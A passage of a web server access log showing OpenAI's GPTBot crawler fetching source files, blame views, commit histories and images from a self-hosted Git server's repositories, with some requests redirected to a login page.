"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10770] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" +[17/Feb/2026:14:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" +[17/Feb/2026:14:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 12438] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" +[17/Feb/2026:14:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 3437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" +[17/Feb/2026:14:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 12474] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" +[17/Feb/2026:14:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" +[17/Feb/2026:14:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 1014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" +[17/Feb/2026:14:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" +[17/Feb/2026:14:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" +[17/Feb/2026:14:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:14:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:14:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:14:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:14:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:14:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:14:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153443] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21524] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:14:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 24868] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:14:20:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/" +[17/Feb/2026:14:20:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:14:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/" +[17/Feb/2026:14:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11659] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:14:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:14:20:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:14:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues/new" +[17/Feb/2026:14:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:14:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10487] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:14:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19492] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets" [Client 74.7.227.38] [Length 49423] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23749] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" +[17/Feb/2026:14:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 32988] [Gzip 11.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:14:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 13033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:14:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" +[17/Feb/2026:14:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10965] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" +[17/Feb/2026:14:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" +[17/Feb/2026:14:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21042] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11256] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21645] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 626446] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" +[17/Feb/2026:14:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 